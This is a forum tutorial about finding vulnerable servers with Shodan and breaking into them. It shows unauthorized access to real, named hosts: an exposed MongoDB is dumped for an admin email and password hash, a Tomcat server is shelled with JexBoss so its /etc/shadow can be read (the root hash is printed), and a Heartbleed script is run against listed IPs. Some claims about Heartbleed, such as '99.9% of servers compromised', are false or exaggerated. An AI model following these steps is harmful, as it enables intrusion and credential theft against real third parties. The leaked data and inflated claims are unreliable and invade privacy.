Forum Thread: Pentesting with Shodan & Functional Exploits By [Mohamed Ahmed ]

today we will touch on "SHODAN" in its Pentesting mode, using functional Exploits that will help them understand and audit vulnerable servers that exist.

first before going through the exploit methodology, we will have an "Extra" with a database manager "little known by some", but used by large & small servers.

source & more information:

https://en.wikipedia.org/wiki/MongoDB

as we know MongoDB is a DB system based on the Open source concept, but because such manager is in this POST.

In its web platform, shodan has several sections where we can interact with them, a clear example is "Databases":

https: //www.shodan .

We can see that it shows us known services such as "MySQL" and "PostgreSQL" named (The Oracle OpenSource).

Among others that we will use in this proof of concept "MongoDB", etc.

You can give "CLIP" to the mongoDB service Or simply use your "DORK" for a personalized search.

product: MongoDB

We can see in the image only shows "2" results, that if read well we have what is called "INFORMATION LEAK".

What is an information leak?

They are delicate or sensitive information data of a private service that is shown for human reasons or badly protected directories, but in their great majority there are services that show such data as it is MongoDB:

Code: Select
173.208.176.236
Database Name Size
zakey 49.8 GB
local 2.1 MB
admin 1 byte

We have: IP and the database that throws us directly, although we know that a server with credentials does not find more than a user panel, because in this search gives us sensitive data.

It's simple, because when searching for the MongoDB product, shodan begins to collect information from such a database manager, which has a poor security configuration.

How can we "access" vulnerable services?

good is simple, if you are in GNU you can install the mongoDB service as follows:

Code: Select
root@kali:~# apt-get install mongodb

once installed, we must activate the service as follows:

Code: Select
root@kali:~# service mongodb start

after activating the service, as you can see if it is activated, it is simple:

Code: Select
root@kali:~# service mongodb status

as we see in the picture our service is active, now how we connect to our victim.

In this proof of concept our victim will be:

https://myeglu.com/

https://www.shodan.io/host/104.155.198.131

Connecting to the server of our victim:

Code: Select
root@kali:~# mongo --host 104.155.198.131

as we see that we have connected to the server through the shell, now will teach the mongodb syntax process to interact in the database

Code: Select
> show dbs

• see all the database.

Code: Select
> use shop

• Choose the database to interact.

Code: Select
> show tables

• see tables in the database.

Code: Select
> db.accounts.findOne()

• Extract all the attributes of a table.

The first thing I did was to set up a database view of the server, later I chose the database called "shop", then run show tables to see all the tables that have and without doubt dumpie the data in the table "accounts" and I was able to obtain the attributes of said credential:

Code: Select
"name" : "gopinath@wiznsystems.com",
"email" : "gopinath@wiznsystems.com",
"password" : "$2a$07$342f56c383d6bd241ed54OLVQdfEDP3jZA.PiaO8BGP3yosLCevRy",
"roles" :
"admin"

so you can edit all the attributes of the columns because you have all the necessary privileges, if you are the people who are bored writing everything in plain text syntax, you can install "Robomongo" - GUI to facilitate this process:

Download:

https://robomongo.org/download

Pentesting

Exploiting an apache server by getting a SHELL through failure 5-5.
of tomcat.

The bug has a long time to be discovered, a long time ago, in my case I would have chosen to do it for msfconsole but I was very lazy xD

since I would like to teach them how to audit an apache server to know if it is vulnerable or not, and exploit it in different ways, but I think that for more techniques that teach them, all that process can be optimized by the following exploit:

--"Jexboss"-

https : //github.com/joaomatosf/jexboss

Download:

Code: Select
root@kali:~# git clone https://github.com/joaomatosf/jexboss

• Finding vulnerable servers:

Server: Apache-Coyote / 1.1 Tomcat-5.5

In my case I chose this server :

http://190.102.149.180:8080/

If you want to use a custom search you can use the following dorks:

country: es " COUNTRY "
city: barcelona" CITY "
hostname: it is" DOMAIN "

you can make any country range you wish.

Code: Select
root@kali:~#cd tomcat

root@kali:~/tomcat# python jexboss.py -host http://190.102.149.180:8080/

as we see we have obtained a session by means of a shell, which we will do will verify that OS is running, for my part seeing that it is a Peruvian computer, I assumed it would be a windows server xD!haha

Let me make it clear, if the operating system is "WINDOWS" we must use #CMD command interpreters, in order to interact correctly with the server. ok

If it is a "GNU" system you can use the "uname -a" command to know the kernel you are using, but this exploit automatically detects and displays the kernel.

navigation very different an example to see the directories and what permissions we would have execute: ls -la.

if you want to obtain credentials of the user of the operating system we will use 2 commands:

Code: Select
Shell> cat /etc/passwd - sirve para verificar los usuarios que corren en diferentes servicios.

Shell> cat /etc/shadow -dumpear credenciales de servicios principales.

Credential:

root: $ 6 $ 3cdgngze $ gafERX.OCPKvDAhgp9WyriAnR / iuDBZq6WjcZxe8BaFGga / Z5Zz1cCfj7aCxrrZB20RL3j6frbVBDzCZiCa9g0: 17107: 0: 99999: 7 :::

Well if you want to get the password you can do it by "brute force" or just running a meterpreter session by msfconsole and start dismantle the server, by a local Exploit.

It should be noted that the exploit has recently been updated, with the addition of more vulnerable services and a "BYPASS" on some WAFs. :)

Exploit heartbleak or heartbleed any fck

Undoubtedly one of the most dangerous BUG's worldwide, discovered in 2014,

Important companies worldwide were victims of attacks such as:
Youtube, Facebook, Google, Twitter, etc., 99.9% of servers worldwide were compromised back then.

We continue with some "Tips", although it is true some people have not exploited a server with the Open SSL vulnerability called Heartbleed.

If you want to find some of these vulnerable servers "SHODAN" offers an advanced search:

https://www.shodan.io/search?query=vuln:cve-2014-0160

We have 141,927 results, so that they are experiencing this type of attack .

Exploit:

https://mega.nz/#!vURiyJgY!aooAkIOuSX02CpYwjS45XI3zBD5GfLAM28qsfywJgJs

Once downloaded we extract it with the name of the folder "bleed", later we will go to enter that folder.
Code: Select
root@kali:~# python heartbleed.py 209.166.152.220

It would run this way, without the port for the simple fact of having the port by default

This host runs the service on port 8443:

https://www.shodan.io/host/188.165.216.132

Then we would run it this way :

Code: Select
root@kali:~# python heartbleed.py 188.165.216.132 8443

We exploited the server correctly capturing the traffic of live requests, this bug is feared because it captures the data traffic of requests of the web in its entirety, it is possible to say that if a large "organization" like facebook in 2014 million requests they did per minute, how many credentials were captured live.

Now imagine in millionaire companies like PayPal, Ebay, etc the headache they had at that time and the millions of dollars that were lost.

Lastly I do not want to do this POST too long with other methods, I hope I have helped them.

Regards! hhhhh
see u later mohamed ahmed